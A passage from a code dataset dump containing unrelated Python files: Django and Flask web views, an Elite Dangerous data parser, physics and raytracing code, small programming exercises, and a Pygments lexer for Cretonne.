rilevazioni}\n return render(request, 'provaserver/detections.html', context)\n\n# view visualizzazione dashboard terze parti:\n\n\n@login_required\ndef view_thirdparts(request):\n\n terzeparti = Terze_Parti.objects.all().filter(user=request.user)\n context = {'terzeparti': terzeparti}\n return render(request, 'provaserver/thirdparts.html', context)\n\n# view visualizzazione modifica profilo admin:\n\n\n@login_required\ndef edit_profile(request):\n\n if request.method == 'POST':\n form = UserChangeForm(request.POST, instance=request.user)\n if form.is_valid():\n form.save()\n return redirect('/profile')\n else:\n return redirect('provaserver//edit_profile.html/')\n\n else:\n form = UserChangeForm(instance=request.user)\n args = {'form': form}\n return render(request, 'provaserver//edit_profile.html/', args)\n\n# view pagina informazioni:\n\n\ndef info_redirect(request):\n\n return render(request, 'provaserver/informazioni.html')\n\n\n@api_view(['GET'])\ndef rilevazioni_collection(request):\n \"\"\"\n List all snippets, or create a new snippet.\n \"\"\"\n if request.method == 'GET':\n rileva = Rilevazione.objects.all()\n serializer = RilevSerializer(rileva, many=True)\n return Response(serializer.data)\n\n\n@api_view(['GET'])\ndef sensore_collection(request):\n if request.method == 'GET':\n posts = Sensore.objects.all()\n serializer = SensoreSerializer(posts, many=True)\n return Response(serializer.data)\n\n\n@api_view(['GET'])\ndef impianto_collection(request):\n if request.method == 'GET':\n posts = Impianto.objects.all()\n serializer = ImpiantoSerializer(posts, 
many=True)\n return Response(serializer.data)\n","sub_path":"untitled1.2(Kiuwan99.9%) copia/untitled1/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":3731,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"}
+{"seq_id":"178163334","text":"# -*- coding:utf-8 -*-\n# ! python3\n\n'''\n Copyright 2017 Sebastian Bauer\n \n Licensed under the Apache License, Version 2.0 (the \"License\");\n you may not use this file except in compliance with the License.\n You may obtain a copy of the License at\n \n http://www.apache.org/licenses/LICENSE-2.0\n\n Unless required by applicable law or agreed to in writing, software\n distributed under the License is distributed on an \"AS IS\" BASIS,\n WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.\n See the License for the specific language governing permissions and\n limitations under the License. \n'''\n\nimport os\nimport json\nimport csv\nimport sys\nimport multiprocessing as mp\nfrom abc import ABC, abstractmethod\nfrom collections import namedtuple\nfrom typing import Dict, List\nfrom EddbFilter import AbstractEddbFilter\nfrom EliteSystem import EliteSystem\n\nFilterWrapper = namedtuple(\"FilterWrapper\", \"filterClass, systemDictionary, filterDictionary, filteredSystems\")\n\nclass AbstractEddbParser(ABC):\n def __init__(self, dir: str, filters: List[AbstractEddbFilter]):\n self.steps = 100 * 1000\n self.filters = dict() # key: filterName; value: FilterWrapper\n self.dir = dir\n\n # systemDictionary: dict; # key = EDDB id, value = EliteSystem\n # filterDictionary: dict; key = EDDB id, value = dictionary of filter names as key and boolean as value\n # filteredSystems: list of EliteSystems\n for eddbFilter in filters:\n self.filters.setdefault(eddbFilter.uniqueFilterName(), FilterWrapper(eddbFilter, dict(), dict(), list()))\n\n @abstractmethod\n def parseSystems(self):\n \"\"\"Parse the systems.csv. It also fills systemDictionary and filterDictionary for each filter class.\n AbstractEddbFilter.filterSystems() is called for each system while parsing the file.\n This method has to be executed first.\n \"\"\"\n raise NotImplementedError(\"Implement parseSystems\")\n\n @abstractmethod\n def parseBodies(self):\n \"\"\"Parse bodies.jsonl. It fills filterDictionary for each filter class but only in systems\n that are in systemDictionary for that particular filter class.\n AbstractEddbFilter.setFiltersBody() is called for each body, that is within system that is not filtered out, while parsing the file.\n \"\"\"\n raise NotImplementedError(\"Implement parseBodies\")\n\n def applyFilters(self):\n \"\"\"Apply the filters for each system. 
\n AbstractEddbFilter.applyFilters() is called for each filter class\n \"\"\"\n for eddbFilter in self.filters.values():\n eddbFilter.filterClass.prepareApplyFilters(eddbFilter.filterDictionary, eddbFilter.filteredSystems, eddbFilter.systemDictionary)\n\n def passOnResults(self):\n \"\"\"Pass on the results (the desired systems) to each filter class\"\"\"\n for eddbFilter in self.filters.values():\n eddbFilter.filterClass.useResults(eddbFilter.filteredSystems)\n\nclass EddbParserSingleProcess(AbstractEddbParser):\n\n def parseSystems(self):\n with open(os.path.join(self.dir, \"systems.csv\"), \"r\", encoding=\"utf8\") as listings_csv:\n i = 0\n listingsDataDump = csv.reader(listings_csv)\n\n print(\"Parsing listings.csv...\")\n for row in listingsDataDump:\n if listingsDataDump.line_num == 1:\n continue # skip first row\n i += 1\n\n for eddbFilter in self.filters.values(): \n if eddbFilter.filterClass.filterSystems(row):\n system = EliteSystem(row[2], float(row[3]), float(row[4]), float(row[5]))\n eddbID = int(row[0])\n eddbFilter.systemDictionary.setdefault(eddbID, system)\n eddbFilter.filterDictionary.setdefault(eddbID, {})\n if i % self.steps == 0:\n print(\"Parsed {0:,} systems so far...\".format(i))\n\n print(\"Done parsing listings.csv. Parsed a total of {0:,} systems\".format(i))\n for eddbFilter in self.filters.values():\n print(\"Found {0:,} systems matching the filters of {1}\".format(len(eddbFilter.filterDictionary.keys()), eddbFilter.filterClass.uniqueFilterName()))\n\n\n def parseBodies(self):\n print('Parsing bodies.jsonl...')\n with open(os.path.join(self.dir, \"bodies.jsonl\"), \"r\", encoding=\"utf8\") as bodies:\n i = 0\n for line in bodies:\n bodiesJson = json.loads(line)\n\n i += 1\n if i % self.steps == 0:\n print(\"Parsed {0:,} bodies so far...\".format(i))\n\n for eddbFilter in self.filters.values():\n if bodiesJson[\"system_id\"] in eddbFilter.systemDictionary:\n eddbFilter.filterClass.setFiltersBody(bodiesJson, eddbFilter.filterDictionary[bodiesJson[\"system_id\"]])\n\n print(\"Done parsing bodies.jsonl. 
Parsed a total of {0:,} bodies\".format(i))\n\nclass EddbParserHybrid(EddbParserSingleProcess):\n def __init__(self, dir: str, filters: List[AbstractEddbFilter], numberOfProcesses: int=6):\n EddbParserSingleProcess.__init__(self, dir, filters)\n self.numberOfProcesses = numberOfProcesses\n\n def parseBodies(self):\n # create queues for communication\n bodyQueue = mp.Queue(maxsize = 100)\n bodyOutQueue = mp.Queue()\n\n def bodyWorker(name, inQueue, outQueue, filters):\n localFilters = filters.copy()\n\n #print(\"bodyWorker {0} init\".format(name))\n while True:\n lines = inQueue.get()\n if not lines: break\n\n #print(\"bodyWorker {0} start\".format(name))\n for line in lines:\n bodiesJson = json.loads(line)\n for eddbFilter in localFilters:\n if bodiesJson[\"system_id\"] in eddbFilter.systemDictionary:\n eddbFilter.filterClass.setFiltersBody(bodiesJson, eddbFilter.filterDictionary[bodiesJson[\"system_id\"]])\n #print(\"bodyWorker {0} stop\".format(name))\n\n outQueue.put(localFilters)\n \n bodyWorkers = list()\n for i in range(self.numberOfProcesses):\n worker = mp.Process(target=bodyWorker, args=(i, bodyQueue, bodyOutQueue, list(self.filters.values())))\n bodyWorkers.append(worker)\n\n for worker in bodyWorkers:\n worker.start()\n\n print('Parsing bodies.jsonl...')\n with open(os.path.join(self.dir, \"bodies.jsonl\"), \"r\", encoding=\"utf8\") as bodies:\n lines = list()\n\n for iBodies, line in enumerate(bodies):\n lines.append(line)\n if iBodies % (self.steps / 10) == 0: # transferring too many lines takes too long\n bodyQueue.put(lines)\n lines = list()\n if (iBodies + 1) % self.steps == 0:\n print(\"Parsed {0:,} bodies so far...\".format(iBodies + 1))\n\n for worker in bodyWorkers:\n bodyQueue.put(None)\n print(\"Waiting for worker processes...\")\n for i in range(self.numberOfProcesses):\n eddbFilters = bodyOutQueue.get()\n print(\"Merging results of process #{0}...\". format(i + 1))\n # merge results from worker processes into the main process\n for eddbFilter in eddbFilters:\n for systemId, v in eddbFilter.filterDictionary.items():\n for filterName, filterValue in v.items():\n mergedValue = eddbFilter.filterClass.mergeMultiProcess(filterName, self.filters[eddbFilter.filterClass.uniqueFilterName()].filterDictionary[systemId].get(filterName, None) , filterValue)\n self.filters[eddbFilter.filterClass.uniqueFilterName()].filterDictionary[systemId][filterName] = mergedValue\n\n for worker in bodyWorkers:\n worker.join()\n print(\"Done parsing bodies.jsonl. Parsed a total of {0:,} bodies\".format(iBodies + 1))\n\nclass EddbParserMultiProcess(EddbParserHybrid):\n \"\"\"Multi process implementation of AbstractEddbParser. 
May not run on Windows.\"\"\"\n\n def __init__(self, dir: str, filters: List[AbstractEddbFilter], numberOfProcesses: int=6):\n EddbParserHybrid.__init__(self, dir, filters, numberOfProcesses)\n \n def parseSystems(self):\n # create queues for communication\n systemQueue = mp.Queue(maxsize = 10)\n systemOutQueue = mp.Queue()\n\n # function that is run in extra process\n def systemWorker(name, inQueue, outQueue, filters):\n localFilters = filters.copy()\n while True:\n rows = inQueue.get()\n if not rows: break\n #print(\"systemWorker {0} start\".format(name))\n csvRows = csv.reader(rows)\n for row in csvRows:\n for eddbFilter in localFilters: \n if eddbFilter.filterClass.filterSystems(row):\n system = EliteSystem(row[2], float(row[3]), float(row[4]), float(row[5]))\n eddbID = int(row[0])\n eddbFilter.systemDictionary.setdefault(eddbID, system)\n eddbFilter.filterDictionary.setdefault(eddbID, {})\n #print(\"systemWorker {0} end\".format(name))\n outQueue.put(localFilters)\n \n systemWorkers = list()\n for i in range(self.numberOfProcesses):\n worker = mp.Process(target=systemWorker, args=(i, systemQueue, systemOutQueue, list(self.filters.values())))\n systemWorkers.append(worker)\n\n for worker in systemWorkers:\n worker.start()\n\n with open(os.path.join(self.dir, \"systems.csv\"), \"r\", encoding=\"utf8\") as listings_csv:\n print(\"Parsing listings.csv...\")\n\n rows = list()\n for iSystems, line in enumerate(listings_csv):\n if iSystems == 0: continue # skip the 1st row\n rows.append(line)\n # to minimize inter-process communication, pass on number of \"steps\" lines\n if (iSystems + 1) % self.steps == 0:\n print(\"Parsed {0:,} systems so far...\".format(iSystems + 1))\n systemQueue.put(rows)\n rows = list()\n\n for worker in systemWorkers:\n systemQueue.put(None) # put termination signals into the queue\n print(\"Waiting for worker processes...\")\n for i in range(self.numberOfProcesses):\n eddbFilters = systemOutQueue.get()\n print(\"Merging results of process #{0}...\". format(i + 1))\n # merge results from worker processes into the main process. each system is unique: just copy the keys and values\n for eddbFilter in eddbFilters:\n self.filters[eddbFilter.filterClass.uniqueFilterName()].systemDictionary.update(eddbFilter.systemDictionary)\n self.filters[eddbFilter.filterClass.uniqueFilterName()].filterDictionary.update(eddbFilter.filterDictionary)\n for worker in systemWorkers:\n worker.join()\n\n print(\"Done parsing listings.csv. Parsed a total of {0:,} systems\".format(iSystems))\n for eddbFilter in self.filters.values():\n print(\"Found {0:,} systems matching the filters of {1}\".format(len(eddbFilter.filterDictionary.keys()), eddbFilter.filterClass.uniqueFilterName()))\n","sub_path":"Parser/EddbParser.py","file_name":"EddbParser.py","file_ext":"py","file_size_in_byte":11580,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"}
+{"seq_id":"515524419","text":"import bson\nfrom cerberus import Validator\nfrom api.util import Bson\n\nrequest_validator_schema = {\n '_id': {\n 'type': 'string'\n },\n 'service_id': {\n 'type': 'string',\n 'check_with': Bson.validate_schema_id\n },\n 'method': {\n 'type': 'string',\n 'allowed': ['POST', 'PUT']\n },\n 'schema': {\n 'type': 'dict'\n },\n 'password_field': {\n 'type': 'string'\n },\n 'password_policy': {\n 'type': 'dict',\n 'schema': {\n 'length': {\n 'type': 'integer',\n 'min': 0\n },\n 'upper_case_count': {\n 'type': 'integer',\n 'min': 0\n },\n 'numbers_count': {\n 'type': 'integer',\n 'min': 0\n },\n 'specials_count': {\n 'type': 'integer',\n 'min': 0\n },\n 'non_letters_count': {\n 'type': 'integer',\n 'min': 0\n },\n 'strength': {\n 'type': 'float',\n 'min': 0.0,\n 'max': 1.0\n }\n }\n },\n 'err_response_code': {\n 'type': 'integer',\n }\n}\n\nrequest_validator = Validator(request_validator_schema)\n","sub_path":"api/request_validator/schema.py","file_name":"schema.py","file_ext":"py","file_size_in_byte":1293,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"}
+{"seq_id":"529586466","text":"#!/usr/bin/env python\n# coding: utf-8\n\nimport numpy as np\nfrom sympy import pprint\n\nimport husimi_homo as model\nfrom list_tools import element_number_changed\n\n\n# brute force phase limits\n# ATTENTION, this code works only for first order phase transitions ending in a critical point, \n# such as paramagnetic-ferromagnetic and liquid-gas\ndef bf_phase_curves(ep=1.0, et=0.0, t_list = np.linspace(0.02,0.04,num=2), mu_list = np.linspace(-4.5,-1.5,num=10) ):\n \"\"\"\n Usage:\n > bf_phase_curves(ep=cep, et=cet, t_list = ct_list, mu_list = cmu_list ):\n # float ep: pair interaction \n # float et: triplet interaction\n # t_list: list of temperatures\n # mu_list: list of chemical potentials\n \"\"\"\n\n sl = [] # stability limits for the gas phase\n\n for t in t_list:\n # print('t = ', t)\n raw_data = [ model.eos_data(vt=t, vmu=mu, vep=ep, vet=et) for mu in mu_list ] # one temperature\n index_sl = element_number_changed( raw_data ) \n\n if ( len(index_sl) == 2 ): # it is implicit that the data has two coexistences within its data\n min_liq = index_sl[ 0 ]\n max_gas = index_sl[ 1 ] - 1 # Be sure to choose limits, be sure to find up to two phases, etc... \n sl.append( [ t, mu_list[min_liq], mu_list[max_gas] ] ) \n\n elif ( len(index_sl) == 0 ) and ( len(sl) > 0 ):\n print(f\"t={t:3.2f}\")\n break\n elif ( len(index_sl) == 0 ) and ( len(sl) == 0 ):\n print(f\"No phase transition for t={t:3.2f}\\n\")\n print(\"Finishing...\\n\")\n break\n elif len(index_sl) == 1:\n print(f\"t = {t:3.2f} Expecting three regimes (gas, coexistence, liquid) but found only two...\\n\")\n\n return sl\n\n# def phase_coexistence(ep=1.0, et=0.0, t = 0.1, mu_list = np.linspace(-4.5,-1.5,num=4), ):\n \n# raw_data = [ model.eos_data(vt=t, vmu=mu, vep=ep, vet=et) for mu in mu_list ] \n \n# # separating data into gas and liquid phase data\n# pure_gas = raw_data[:min_liq]\n# pure_gas = list(map( lambda x: x[0], pure_gas ))\n\n# pure_liq = raw_data[max_gas+1:]\n# pure_liq = list(map( lambda x: x[0], pure_liq ))\n\n# coex = [ x for x in raw_data if len(x) > 1]\n# gas.append( pure_gas + [ select_phase( data , select=min ) for data in coex ] )\n# liq.append( [ select_phase( data , select=max ) for data in coex ] + pure_liq )\n \n# # TODO: insert calculations for coexistence HERE!!!!!!\n\n\ndef bf_stability_limits (ep=1.0, et=0.0, mu_list = np.linspace(-4.5,-1.5,num=61), t=0.02 ):\n \"\"\"\n bf_stability_limits - This seems to be OK. \n \"\"\"\n sl = [] # stability limits (on chemical potential)\n\n phases = [ model.eos_num_roots(vt=t, vmu=mu, vep=ep, vet=et) for mu in mu_list ] # one temperature, only the numbers\n \n for i in range(1,len(phases) ):\n \n if phases[i] > phases[i-1]:\n sl.append( mu_list[i] )\n elif phases[i] < phases[i-1]:\n sl.append( mu_list[i-1] ) \n\n if sl:\n sl = [t] + sl\n \n return sl\n\n\ndef rs_stability_limit (cep=1.0, cet=0.0, ct = 0.02, mui=-5.0, muf=-4.1, mu_points=10 , max_error = 10e-3 ): \n \"\"\"\n Usage:\n > rs_stability_limit (cep=1.0, cet=0.0, ct = 0.02, mui=-5.0, muf=-4.1, mu_points=10 , max_error = 10e-3 )\n \n # Comments: - Can search to right or left. 
\n # - rs stands for recursive search.\n \"\"\"\n\n\n sign = abs(muf-mui)/(muf-mui) # find to right or left\n error = abs(( muf-mui )/mu_points)\n \n \n sl = bf_stability_limits (ep=cep, et=cet, mu_list = np.linspace(mui,muf,num=mu_points), t=ct )\n \n if not sl:\n print('rs_stability_limit(): Stability limits not found in the first run.')\n return None\n\n mu = sl[1]\n \n while error > max_error:\n\n mui = mu - 2*sign*error # I had a problem with just one error... while approaching on the third order loop.\n muf = mu + 2*sign*error\n error = abs(( muf-mui )/mu_points)\n \n sl = bf_stability_limits (ep=cep, et=cet, mu_list = np.linspace(mui, muf,num=mu_points), t=ct )\n mu = sl[1]\n\n return [ct,mu]\n\n\ndef main():\n \"\"\"\n stability_limits.py\n 2019-02-21 Marco Barbosa - aureliobarbosa@unb.br\n \n Calculate stability limits of equation of state given by husimi_homo.py \n \"\"\"\n\n mui = -4.5; muf = -1.5; mu_points = 101 \n cmu_list = np.linspace(mui,muf,num=mu_points) # current mu_list\n \n\n ti = 0.02; tf = 0.62; t_points = 7\n ct_list = np.linspace(ti,tf,num=t_points)\n\n \n sl = bf_phase_curves(t_list=ct_list,mu_list = cmu_list)\n \n for data in sl:\n print(data)\n \n return None\n\nif __name__ == \"__main__\":\n main()\n\n","sub_path":"python/phases.py","file_name":"phases.py","file_ext":"py","file_size_in_byte":4806,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"}
+{"seq_id":"225931961","text":"import unittest\nimport envtest # modifies path\nfrom raytracing import *\n\ninf = float(\"+inf\")\n\n\nclass TestImagingPath(unittest.TestCase):\n def testImagingPathInfiniteFieldOfView(self):\n path = ImagingPath()\n path.append(System2f(f=10))\n self.assertEqual(path.fieldOfView(), inf)\n\n def testImagingPathInfiniteFieldOfView2(self):\n path = ImagingPath()\n path.append(System2f(f=10, diameter=10))\n self.assertEqual(path.fieldOfView(), inf)\n\n def testImagingPathInfiniteFieldOfView3(self):\n path = ImagingPath()\n path.append(System2f(f=10, diameter=10))\n path.append(Aperture(diameter=20))\n self.assertAlmostEqual(path.fieldOfView(), 20, 2)\n\n def testDisplayRangeWithFiniteLens(self):\n path = ImagingPath() # default objectHeight is 10\n path.append(Space(d=10))\n path.append(Lens(f=5, diameter=20))\n\n largestDiameter = 20\n\n self.assertEqual(path.displayRange(), largestDiameter)\n\n def testDisplayRangeWithObjectHigherThanLens(self):\n path = ImagingPath()\n path.objectHeight = 20\n path.append(Space(d=10))\n path.append(Lens(f=5, diameter=20))\n\n largestDiameter = path.objectHeight * 2\n\n self.assertEqual(path.displayRange(), largestDiameter)\n\n def testDisplayRangeWithEmptyPath(self):\n path = ImagingPath()\n\n largestDiameter = path.objectHeight * 2\n\n self.assertEqual(path.displayRange(), largestDiameter)\n\n def testEntrancePupilAIs0(self):\n space = Space(2)\n lens = Lens(10, 110)\n space2 = Space(10, diameter=50)\n elements = [space, lens, space2]\n path = ImagingPath(elements)\n self.assertIsNotNone(path.entrancePupil())\n\n\nif __name__ == '__main__':\n unittest.main()\n","sub_path":"raytracing/tests/testsImagingPath.py","file_name":"testsImagingPath.py","file_ext":"py","file_size_in_byte":1795,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"}
+{"seq_id":"61854045","text":"def bs(arr,ele):\r\n start=0\r\n end=len(arr)-1\r\n while(start<=end):\r\n mid=start+((end-start)//2)\r\n if arr[mid]==ele:\r\n return mid\r\n elif arr[mid]>ele:\r\n res=mid\r\n end=mid-1\r\n else:\r\n start=mid+1\r\n return res\r\n\r\na=[1,2,3,5,6]\r\nprint(a[bs(a,4)])","sub_path":"ceil_in_array.py","file_name":"ceil_in_array.py","file_ext":"py","file_size_in_byte":324,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"}
+{"seq_id":"332317104","text":"\"\"\"\nThis module takes care of starting the API Server, Loading the DB and Adding the endpoints\n\"\"\"\nimport os\nfrom flask import Flask, request, jsonify, url_for\nfrom flask_cors import CORS\nfrom utils import APIException, generate_sitemap\nfrom datastructures import FamilyStructure\n#from models import Person\n\napp = Flask(_name_)\napp.url_map.strict_slashes = False\nCORS(app)\n\n# create the jackson family object\njackson_family = FamilyStructure(\"Jackson\")\n\n# Handle/serialize errors like a JSON object\n@app.errorhandler(APIException)\ndef handle_invalid_usage(error):\n return jsonify(error.to_dict()), error.status_code\n\n# generate sitemap with all your endpoints\n@app.route('/')\ndef sitemap():\n return generate_sitemap(app)\n\n@app.route('/members', methods=['GET', 'POST', 'DELETE', 'PUT'])\n@app.route('/members/', methods=['GET', 'POST', 'DELETE', 'PUT'])\ndef members(member_id=None):\n\n if request.method == \"GET\":\n if member_id is None:\n return jsonify(jackson_family.get_all_members()), 200\n\n else:\n jack = jackson_family.get_member(member_id)\n if not jack:\n return jsonify({\"msg\":\"this ID not exist\"}), 400\n return jsonify(jack), 200\n\n\n elif request.method == \"POST\":\n idd = jackson_family._generateId()\n name = request.json.get(\"name\", \"\")\n if not name:\n return jsonify({\"msg\": \"name is required\"}), 400\n new_member = {\n \"id\": idd,\n \"first_name\": name,\n \"last_name\": \"Jackson\"\n }\n add = jackson_family.add_member(new_member)\n return jsonify(jackson_family.get_all_members()), 200\n\n\n elif request.method == \"DELETE\":\n jack = jackson_family.delete_member(member_id)\n if not jack:\n return jsonify({\"msg\":\"this ID not exist\"}), 400\n return jsonify(jackson_family.get_all_members()), 200\n \n\n@app.route(\"/example\", methods=[\"GET\",\"POST\"])\ndef example():\n # this is how you can use the Family datastructure by calling its methods\n members = jackson_family.get_all_members()\n response_body = {\n \"hello\": \"world\",\n \"family\": members\n }\n return jsonify(members), 200\n\n# this only runs if `$ python src/app.py` is executed\nif _name_ == '_main_':\n PORT = int(os.environ.get('PORT', 3000))\n app.run(host='0.0.0.0', port=PORT, debug=True)","sub_path":"src/app.py","file_name":"app.py","file_ext":"py","file_size_in_byte":2391,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"}
+{"seq_id":"202692189","text":"class hotelRoom:\n roomNumber = 0\n maxGuests = 0\n numGuests = 0\n nightsBooked = 0\n roomInUse = False\n\n # static variables\n countRoomsInUse = 0\n countTotalGuests = 0\n peekSeason = True\n\n def __init__(self, roomNumber_in=0, maxGuests_in=0):\n self.numGuests = 0\n self.nightsBooked = 0\n self.roomInUse = 0\n self.roomNumber = roomNumber_in\n self.maxGuests = maxGuests_in\n\n\n\n # static method - don't need self here\n @staticmethod\n def Cost_room():\n nightStayCost = 0\n if hotelRoom.peekSeason: # static variable\n nightStayCost += 250\n else:\n nightStayCost += 150\n return nightStayCost\n\n\n def check_in(self, numGuests_in=0, nightsBooked_in=0, roomInUse_in=True ):\n self.roomInUse = roomInUse_in\n self.numGuests = numGuests_in\n self.nightsBooked = nightsBooked_in\n hotelRoom.countRoomsInUse += 1\n hotelRoom.countTotalGuests += self.numGuests\n\n\n\n\n # # static method - don't need self here\n # @staticmethod\n def check_out(self):\n self.numGuests = 0\n self.nightsBooked = 0\n self.roomInUse = False\n hotelRoom.countRoomsInUse -= 1\n hotelRoom.countTotalGuests = 0\n\n\n # Dont actually need this but in case we did what a print def within our class\n # def my_print(self):\n # print('*****************')\n # print('** Hotel Costs **')\n # print('Total Guests: {}'.format(hotelRoom.countTotalGuests))\n # print('Total Rooms in Use: {}'.format(hotelRoom.countRoomsInUse))\n # if hotelRoom.peekSeason:\n # print(\"Peek Season: Yes\")\n # else:\n # print(\"Peek Season: No\")\n # #print('Room Cost: {}'.format()) # how to call return functions\n # print('Room Number: {}'.format(self.roomNumber))\n # print('Max Guests: {}'.format(self.maxGuests))\n # print('Number of Guests: {}'.format(self.numGuests))\n # print('Nights Booked: {}'.format(self.nightsBooked))\n # print('Room In Use: {}'.format(self.roomInUse))\n\n\n#class instance\n\n# Test this class in the main program body using the following:\n\n# • Create two rooms with appropriate arguments\nroom1 = hotelRoom(5,8) # init arguments\nroom2 = hotelRoom(10,12) # init arguments\n\n\n# • Print the static variables to show total guests in hotel and total rooms in use\nprint('Rooms in Use Pre Check In: {}'.format(hotelRoom.countRoomsInUse)) # 0\nprint('Total Guests Pre Check In: {}'.format(hotelRoom.countTotalGuests)) # 0\nprint('Peek Season: {}\\n'.format(hotelRoom.peekSeason)) # True\n\n# • Check in guests to both rooms using appropriate arguments\nroom1.check_in(2,10) # didn't need to pass in room in use as set to True\nroom2.check_in(5,20) # didn't need to pass in room in use as set to True\n\n# • Print the cost of each room\nprint(\"Room 1 Cost: €{}\".format(int(room1.Cost_room()) * (room1.nightsBooked)))\nprint(\"Room 2 Cost: €{}\\n\".format(int(room2.Cost_room()) *(room2.nightsBooked)))\n\n# • Print the static variables to show total guests in hotel and total rooms in use\nprint('Rooms in Use Post Check In: {}'.format(hotelRoom.countRoomsInUse)) # 0 # **** check how I got that right *****\nprint('Total Guests Post Check In: {}\\n'.format(hotelRoom.countTotalGuests)) # 0\n\n# Don't need this just had if want to print like this - room1.my_print()\n\n# • Check out guests from both rooms\nroom1.check_out()\nroom2.check_out()\n\n# • Print the static variables to show total guests in hotel and total rooms in use\nprint('Rooms in Use Post Check Out: {}'.format(hotelRoom.countRoomsInUse)) # 0 # **** check how I got that right *****\nprint('Total Guests Post Check Out: {}\\n'.format(hotelRoom.countTotalGuests)) 
# 0\n\n\n\n\n\n\n\n\n","sub_path":"Lectures, Labs & Exams/Labs/Lab 7/RB X00152190 Lab 7.py","file_name":"RB X00152190 Lab 7.py","file_ext":"py","file_size_in_byte":3755,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"}
+{"seq_id":"347946245","text":"# coding=utf-8\nfrom django.shortcuts import render, redirect\nfrom django.contrib import messages\nfrom django.core.exceptions import ObjectDoesNotExist\nfrom .util.forms import *\nfrom apps.modelodb.models import ContaCorrente, ContaPoupanca, Deposito\n\n\ndef deposito(request):\n form = get_form(request)\n if request.method == \"POST\":\n form = preenche_form(request)\n if form.is_valid():\n valor = form.cleaned_data[\"valor\"] * 100\n tipo_conta = request.POST.get(\"tipo_conta\", \"\")\n num_conta = request.POST.get(\"conta\", \"\")\n try:\n conta = get_conta(request, tipo_conta, num_conta)\n conta.saldo += valor\n log_op(valor=valor, creditado=conta)\n conta.save()\n return render_success(\n request, \"Deposito realizado com sucesso.\"\n )\n except ObjectDoesNotExist:\n return render_error(request, \"Conta não encontrada.\", form)\n else:\n return render_error(request, \"Dados incorretos.\", form)\n return render(request, \"deposito/deposito.html\", {\"form\": form})\n\n\ndef get_form(request):\n formLogged = DepositoFormLogged({'tipo_conta': '1'})\n formNotLogged = DepositoFormNotLogged()\n if request.user.is_authenticated():\n form = formLogged\n else:\n form = formNotLogged\n return form\n\n\ndef preenche_form(request):\n if request.user.is_authenticated():\n form = DepositoFormLogged(request.POST)\n else:\n form = DepositoFormNotLogged(request.POST)\n return form\n\n\ndef log_op(valor, creditado):\n Deposito.objects.create(\n identificador=\"Deposito\", valor=valor, creditado=creditado\n )\n\n\ndef get_conta(request, tipo_conta, num_conta):\n # Param :\n # tipo_conta\n # 1 = Conta Corrente\n # 2 = Conta Poupança\n # num_conta\n # numero da conta caso não esteja logado\n # Esses valores são definidos no forms.py\n if request.user.is_authenticated():\n if tipo_conta == '1':\n return ContaCorrente.objects.get(usuario__id=request.user.id)\n elif tipo_conta == '2':\n return ContaPoupanca.objects.get(usuario__id=request.user.id)\n else:\n return get_conta_nao_logado(num_conta)\n\n\ndef get_conta_nao_logado(num_conta):\n num_conta_max = ContaPoupanca._meta.get_field('numero_conta').max_length\n if(len(str(num_conta)) == num_conta_max):\n return ContaPoupanca.objects.get(numero_conta=num_conta)\n return ContaCorrente.objects.get(numero_conta=num_conta)\n\n\ndef render_error(request, error_msg, form):\n messages.error(request, error_msg)\n return render(request, \"deposito/deposito.html\", {\"form\": form})\n\n\ndef render_success(request, success_msg):\n messages.success(request, success_msg)\n if request.user.is_authenticated():\n return render(request, \"atm/atm.html\")\n return redirect(\"autenticacao:login\")\n","sub_path":"apps/operacoes/deposito/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":2969,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"}
+{"seq_id":"186925969","text":"import sys\nimport collections\n\nn,k=map(int,input().split())\ns=input()\n\nchars = list(s)\nchars[k-1]=chars[k-1].lower()\n\nmojiretu=''\nfor x in chars:\n mojiretu += x\nprint(mojiretu)","sub_path":"Contest126/A_Changing_a_Character.py","file_name":"A_Changing_a_Character.py","file_ext":"py","file_size_in_byte":179,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"51"}
+{"seq_id":"392465388","text":"# -*- coding: utf-8 -*-\n#\n# Pygments lexer for Cretonne.\n\nfrom pygments.lexer import RegexLexer, bygroups, words\nfrom pygments.token import *\n\ndef keywords(*args):\n return words(args, prefix=r'\\b', suffix=r'\\b')\n\nclass CretonneLexer(RegexLexer):\n name = 'Cretonne'\n aliases = ['cton']\n filenames = ['*.cton']\n\n tokens = {\n 'root': [\n (r';.*?$', Comment.Single),\n # Strings are in double quotes, support \\xx escapes only.\n (r'\"([^\"\\\\]+|\\\\[0-9a-fA-F]{2})*\"', String),\n # A naked function name following 'function' is also a string.\n (r'\\b(function)([ \\t]+)(\\w+)\\b', bygroups(Keyword, Whitespace, String.Symbol)),\n # Numbers.\n (r'[-+]?0[xX][0-9a-fA-F]+', Number.Hex),\n (r'[-+]?0[xX][0-9a-fA-F]*\\.[0-9a-fA-F]*([pP]\\d+)?', Number.Hex),\n (r'[-+]?(\\d+\\.\\d+([eE]\\d+)?|[sq]NaN|Inf)', Number.Float),\n (r'[-+]?\\d+', Number.Integer),\n # Reserved words.\n (keywords('function'), Keyword),\n # Known attributes.\n (keywords('align', 'aligntrap', 'uext', 'sext', 'inreg'), Name.Attribute),\n # Well known value types.\n (r'\\b(b\\d+|i\\d+|f32|f64)(x\\d+)?\\b', Keyword.Type),\n # v = value\n # ss = stack slot\n (r'(v|ss)\\d+', Name.Variable),\n # ebb = extended basic block\n (r'(ebb)\\d+', Name.Label),\n # Match instruction names in context.\n (r'(=)( *)([a-z]\\w*)', bygroups(Operator, Whitespace, Name.Function)),\n (r'^( *)([a-z]\\w*\\b)(?! *[,=])', bygroups(Whitespace, Name.Function)),\n # Other names: results and arguments\n (r'[a-z]\\w*', Name),\n (r'->|=|:', Operator),\n (r'[{}(),.]', Punctuation),\n (r'[ \\t]+', Text),\n ]\n }\n\ndef 